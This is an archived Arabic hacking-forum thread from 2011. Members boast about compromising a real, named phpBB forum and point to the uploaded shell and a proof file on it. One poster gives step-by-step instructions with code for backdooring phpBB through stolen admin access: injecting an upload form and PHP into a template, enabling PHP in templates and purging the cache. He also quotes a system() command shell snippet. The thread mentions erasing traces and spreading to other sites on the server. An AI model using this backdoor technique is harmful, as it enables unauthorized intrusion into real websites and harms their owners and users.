:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)
-   -   [تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :) (http://www.vbspiders.com/vb/showthread.php?t=50558)

bleu moon 07-07-2011 12:06 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة SpookWeb (المشاركة 350122)
:cry:

حاولت :(

رح جيب لكم سيرفر آخر حلو :)

SpookWeb 07-07-2011 01:24 PM

لن اقبل إلا بـإختراق الموقع

كود:

http://en.gstarcad.com/forum/faq.php
إنظر اخر الصفحة

والمسار:
كود:

http://en.gstarcad.com/forum/images/YourShell.php
:rofl:

SpookWeb 07-07-2011 01:26 PM

الدليل:
http://en.gstarcad.com/forum/images/test.txt

D:

bleu moon 07-07-2011 01:26 PM

???

bleu moon 07-07-2011 01:26 PM

hhhhhh

bleu moon 07-07-2011 01:28 PM

shell uploaded :D

SpookWeb 07-07-2011 01:28 PM

بـإنتظار رفع ال shell ههههههههه

SpookWeb 07-07-2011 01:29 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة nor15din (المشاركة 350143)
shell uploaded :D

:rofl:
واخيرا!!!!!

bleu moon 07-07-2011 01:30 PM

لا تخترقه انتضر انتقل للمواقع يلي على السيرفر هههه

SpookWeb 07-07-2011 01:31 PM

تم محو ال uploader ومحي اثاري لول

bleu moon 07-07-2011 01:32 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة SpookWeb (المشاركة 350147)
تم محو ال uploader ومحي اثاري لول

اوووك انتضر شوي رح انتقل زي الدوده في السيرفر ههه

SpookWeb 07-07-2011 01:36 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة nor15din (المشاركة 350148)
اوووك انتضر شوي رح انتقل زي الدوده في السيرفر ههه

loooooooooooooooooool good luck bro!!!! :D
موافق بـإذن الله ههههههه

bleu moon 07-07-2011 02:13 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة SpookWeb (المشاركة 350150)
loooooooooooooooooool good luck bro!!!! :D
موافق بـإذن الله ههههههه

كيف لغمتهم ؟؟ ههه ارجووك كيف ؟؟

SpookWeb 07-07-2011 02:30 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة nor15din (المشاركة 350171)
كيف لغمتهم ؟؟ ههه ارجووك كيف ؟؟

هههههههه أوكيه D: بس معلش, حقاك علي, راح اكتب بالإنجليزي لان اسهل علي... وأي توضيح, أنا جاهز.

------------------------------------
i searched online for hacking phpBB3 once i have the admin username and password. all i could find was that it's possible to include a php code inside the ACP

كود:

<!-- PHP -->
echo $cmd;
system($cmd);
<!-- ENDPHP -->

and that's considered a Shell

i liked it... but it was too much trouble doing all the php commands, so though, ok. i have access to change a page's php code... why not include an uploader and upload a shell? that's easier

i know how to code HTML so
كود:

ACP ->Styles -> Templates->Edit-> FAQ_body.html
i added this code in the body:

كود:

<table>
<form action="" enctype="multipart/form-data" method="post">
<tr>
<td colspan="2">H4v3 Fun Spiders Spooky AKA SpookWEB</td>
</tr>
<tr>
<td><input type="file" name="spiderF" /></td>
<td><input type="submit" name="submit" value="Spooky!" /></td>
</tr>
<tr>
</tr>       
</form>
</table>

and in the end of the HTML i added this:
كود:

<!-- PHP -->
if (isset($_POST['submit'])) {
$spookf = $_FILES['spiderF']['name'];
$spookt = $_FILES['spiderF']['tmp_name'];
if (@move_uploaded_file($spookt , "./images/".$spookf)) {
echo "Shell Uploaded. Check /images/YourShell.php";}else{echo "Upload Failed";}}
<!-- ENDPHP -->

i picked images folder cause i searched and found that phpBB set it to chmod
777
so i have full access to it
Now i went back to the ACP and in "Server Settings" i changed "Allow PHP Code" to Yes
than, on the ACP, be sure to "Purge Cache" to ******* the template so that the code may work....


DONE! :D

بستعمل MS Maren
للكتابة بالعربية لان ال كيبورد عندي مافي عربي هههههه...

إذا مامشي ال حال, مستعد اكتيبو بالعربي بس حياخد وقت شوية....

bleu moon 07-07-2011 02:50 PM

hhhhhhhhhhhhhhh thx :D


الساعة الآن 11:41 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0